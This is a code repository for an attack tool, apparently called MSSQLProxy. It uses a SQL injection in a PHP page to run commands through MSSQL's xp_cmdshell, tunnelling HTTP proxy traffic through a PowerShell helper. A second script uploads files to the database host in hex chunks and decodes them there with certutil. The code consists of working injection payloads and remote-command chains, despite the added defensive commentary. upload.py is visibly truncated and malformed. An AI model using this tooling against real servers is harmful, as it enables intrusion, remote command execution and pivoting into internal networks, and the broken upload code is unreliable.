├── README.md
├── proxy.py
└── upload.py

/README.md:
--------------------------------------------------------------------------------
# MSSQLProxy
一个能够利用MSSQL的xp_cmdshell功能来进行流量代理的脚本,用于在站酷分离且不出网SQL注入进行代理
# 其他
1. upload.py 能够方便的通过SQL注入上传文件
2. proxy.py 能够进行代理,但是在使用前记得更改 `exec_xp_cmdshell` 函数里的注入方法,根据自己的注入点灵活变通
# TODO
- [ ] 支持 `HTTPS` 代理
- [ ] 支持 `Socks` 代理

--------------------------------------------------------------------------------
/proxy.py:
--------------------------------------------------------------------------------
# proxy.py -- Flask HTTP proxy that tunnels every client request through a
# SQL-injection point into MSSQL's xp_cmdshell, where a PowerShell helper
# (mssql_proxy.ps1, NOT part of this listing) presumably performs the real
# TCP send and returns the hex-encoded HTTP response.
#
# Defensive notes grounded in this file:
#   * Each proxied request costs three injected POSTs to sql.php and one
#     xp_cmdshell -> powershell execution on the SQL Server host. xp_cmdshell
#     is disabled by default in MSSQL; its (re-)enablement, and powershell
#     processes descending from sqlservr.exe, are the main host indicators.
#   * The request strings are fixed: the 'MSSQL Proxy' delimiters, the
#     'sqlmapoutput' table, the '-- ZKN' comment tag and the hex-literal
#     @bjxl variable appear in every request and form an easy WAF/IDS
#     signature.
#   * Root cause is the unparameterised `id` parameter of sql.php; a
#     parameterised query and a least-privilege DB login (no sysadmin, no
#     xp_cmdshell) break the whole chain.
import base64
import binascii
import requests
from flask import Flask, request, make_response
import re

# Delimiter pattern used to pull command output back out of the injected
# UNION query's HTML (see exec_xp_cmdshell); non-greedy, so one match per row.
regex = 'MSSQL Proxy(.+?)MSSQL Proxy'
# Hard-coded location of the PowerShell helper on the SQL Server host. The
# helper itself is not included here; upload.py is presumably how it gets there.
script_path = "C:/Users/MSSQLSERVER/AppData/Local/Temp/mssql_proxy.ps1"
app = Flask(__name__)


def exec_xp_cmdshell(cmd):
    """Run *cmd* through xp_cmdshell via the sql.php injection and return its output.

    Three separate injected POSTs are issued against the hard-coded target:
      1. empty the `sqlmapoutput` table (assumed to exist already; it is never
         created here -- presumably left behind by an earlier sqlmap session),
      2. `INSERT ... EXEC master..xp_cmdshell` with the command passed as a
         0x-hex literal, so the command text itself carries no quotes,
      3. a UNION SELECT that wraps every output row in the 'MSSQL Proxy'
         delimiters, which `regex` then extracts from the page.

    Args:
        cmd: command line handed to xp_cmdshell (cmd.exe on the DB host).

    Returns:
        The concatenated, delimiter-stripped rows of xp_cmdshell output
        (empty string if nothing matched).

    Note: no HTTP status/exception handling -- a failed POST raises
    requests' own exception to the Flask handler; a 4000-char NVARCHAR cast
    truncates any single longer output row.
    """
    url = 'http://10.37.129.4/sql.php'
    payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(
        cmd.encode()).decode()

    # Clear stale rows so the read-back below only sees this command's output.
    requests.post(url, data={'id': "1'; DELETE FROM sqlmapoutput-- ZKN"})
    requests.post(url, data={"id": payload})

    # NULL output rows are replaced with a single space (CHAR(32)) so the
    # delimiters still match; ORDER BY id keeps the row order of the output.
    res = requests.post(url, data={
        "id": "1' UNION ALL SELECT NULL, 'MSSQL Proxy' + ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) + 'MSSQL Proxy',NULL FROM sqlmapoutput ORDER BY id-- ZKN"
    })
    return ''.join(re.findall(regex, res.text))


def send_package(ip, port, data):
    """Hand one base64-encoded raw HTTP request to the PowerShell helper.

    Args:
        ip: destination host as taken from the client's Host header.
        port: destination port (int 80 or the string after ':' in Host; both
            are only interpolated into the command line).
        data: base64 text of the raw request bytes built in before_request.

    Returns:
        Whatever exec_xp_cmdshell returns -- per clean_up_response this is
        expected to be a hex-encoded HTTP response, or the literal 'FAILED'.

    Note: the full command line (including the base64 request body) is
    printed to stdout on every call, i.e. proxied traffic lands in the console log.
    """
    cmd = "powershell {script_path} -remoteHost {ip} -port {port} -sendData {data}".format(
        script_path=script_path, ip=ip, port=port, data=data
    )
    print(cmd)
    return exec_xp_cmdshell(cmd)


def clean_up_response(response):
    """Turn the helper's hex-encoded raw HTTP response into a Flask response.

    Args:
        response: hex string of a full HTTP response (status line, headers,
            blank line, body) as returned by exec_xp_cmdshell.

    Returns:
        A Flask response carrying the original status (e.g. "200 OK"), the
        original headers and the body.

    Raises:
        binascii.Error / UnicodeDecodeError if the output is not valid hex
        or not decodable text (no guard exists for an empty or odd-length
        string); IndexError is not raised because split() always yields one
        element, but a response without a blank line becomes an empty body.

    Note: headers are copied verbatim, including hop-by-hop ones such as
    Transfer-Encoding/Content-Length, which may no longer describe the
    stripped body; the value keeps its leading space after the ':'.
    """
    response = binascii.unhexlify(response.strip().encode()).decode()
    headers = response.split('\r\n\r\n')[0]
    body = '\r\n\r\n'.join(response.split('\r\n\r\n')[1:]).strip()
    res = make_response(body)
    # Status line "HTTP/1.1 200 OK" -> Flask status "200 OK".
    res.status = ' '.join(headers.split('\r\n')[0].split(' ')[1:])
    for header in headers.split('\r\n')[1:]:
        res.headers[header.split(':')[0]] = ':'.join(header.split(':')[1:])
    return res


@app.before_request
def before_request():
    """Intercept every incoming request and forward it through the tunnel.

    Rebuilds the raw HTTP request (request line, headers, body) from Flask's
    view of it, with the Connection header forced to `close`, and sends it
    via send_package to the host named in the Host header.

    Returns:
        None for CONNECT (which then falls through to normal routing -- there
        are no routes, so Flask answers 404; this is why HTTPS/CONNECT is an
        open TODO in the README), a plain-text error if no Host header was
        seen, a non-standard status 902 if the helper reported 'FAILED',
        otherwise the reconstructed upstream response.
    """
    if request.method == 'CONNECT':
        return
    # NOTE(review): Flask's full_path appends '?' even when there is no query
    # string, so the forwarded request line may carry a trailing '?' -- confirm.
    package = '{method} {path} {version}\r\n'.format(
        method=request.method,
        path=request.full_path,
        version=request.environ['SERVER_PROTOCOL']
    ).encode()
    host = ''
    for k, v in dict(request.headers).items():
        if k.upper() == 'Connection'.upper():
            package += b'Connection: close\r\n'
            continue
        if k.upper() == 'HOST':
            host = v
        package += '{k}: {v}\r\n'.format(k=k, v=v).encode()
    package += b'\r\n'
    package += request.stream.read()
    # print(package)
    if not host:
        return "HostNotFound\r--MSSQL Proxy"
    # Splits on the first ':' only in the common "host:port" case; a bracketed
    # IPv6 literal would produce more than two parts and raise ValueError here.
    if len(host.split(':')) > 1:
        ip, port = host.split(':')
    else:
        ip, port = host, 80
    response = send_package(ip, port, base64.b64encode(package).decode())
    if response.strip() == 'FAILED':
        return "Failed\r--MSSQL Proxy", 902
    return clean_up_response(response)


if __name__ == '__main__':
    # debug=True on 0.0.0.0 exposes the Werkzeug debugger to anyone who can
    # reach port 4000; the proxy is also unauthenticated, so any such client
    # gets to drive xp_cmdshell on the database host.
    app.run(debug=True, host='0.0.0.0', port=4000)

--------------------------------------------------------------------------------
/upload.py:
--------------------------------------------------------------------------------
# upload.py -- writes a local file onto the SQL Server host through the same
# sql.php injection point, one 512-byte hex chunk per xp_cmdshell call, then
# decodes it in place with certutil.
#
# Defensive notes grounded in this file: a burst of xp_cmdshell executions
# whose command lines append hex text to a "*.tmp" path, followed by
# `certUtil -decodehex` and `del` of that path, is the on-host trace this
# script leaves; the injected strings again carry the fixed '-- ZKN' tag and
# 0x-hex @bjxl variable.
import binascii
import sys
import requests


def exec_xp_cmdshell(cmd):
    """Run *cmd* through xp_cmdshell via the sql.php injection; output is discarded.

    Same hex-literal injection as proxy.py's exec_xp_cmdshell but without the
    INSERT/read-back, so the caller gets no result and no error indication.

    Args:
        cmd: command line handed to xp_cmdshell on the DB host.
    """
    url = 'http://10.37.129.4/sql.php'
    payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(
        cmd.encode()).decode()
    requests.post(url, data={"id": payload})


def main():
    """Entry point: `upload.py <local_file> <remote_path>`.

    Reads the local file in 512-byte chunks, appends each chunk's hex
    encoding to `<remote_path>.tmp` on the DB host (apparently via cmd.exe's
    `set /p` prompt-redirect idiom), then runs certutil -decodehex into the
    final path and deletes the .tmp file.

    Note: exit(1) only guards argument count; the file handle `file` and
    `path_to_save` are bound in listing lines that are missing from this
    extraction (see the NOTE below), and no failure of any remote step is
    detected -- 'Uploaded successfully!' is printed unconditionally.
    """
    if len(sys.argv) < 3:
        print("Usage: python3 upload.py local_file_to_read remote_path_to_save")
        sys.exit(1)

    # NOTE(review): the listing's lines 19-21 are truncated in this extraction;
    # the fragment below is reproduced as found. The assignments of `file` and
    # `path_to_save` (presumably from sys.argv) are among the missing lines.
    cmd = '''>>"{path}" set 
/p="{content}" "{}"'.format(path_to_save + '.tmp'))
    while 1:
        content = file.read(512)
        # Each chunk becomes a separate injected request; the hex doubles the
        # size, so 512 raw bytes -> 1024 hex characters per command line.
        payload = cmd.format(path=path_to_save + '.tmp', content=binascii.hexlify(content).decode())
        exec_xp_cmdshell(payload)
        if len(content) < 512:
            break
    # certutil's -decodehex converts the accumulated hex text back into the
    # original bytes at the final path.
    exec_xp_cmdshell('certUtil -decodehex "{old_path}" "{new_path}"'.format(old_path=path_to_save + '.tmp', new_path=path_to_save))
    exec_xp_cmdshell('del "{}"'.format(path_to_save + '.tmp'))
    print('Uploaded successfully!')


if __name__ == '__main__':
    main()

--------------------------------------------------------------------------------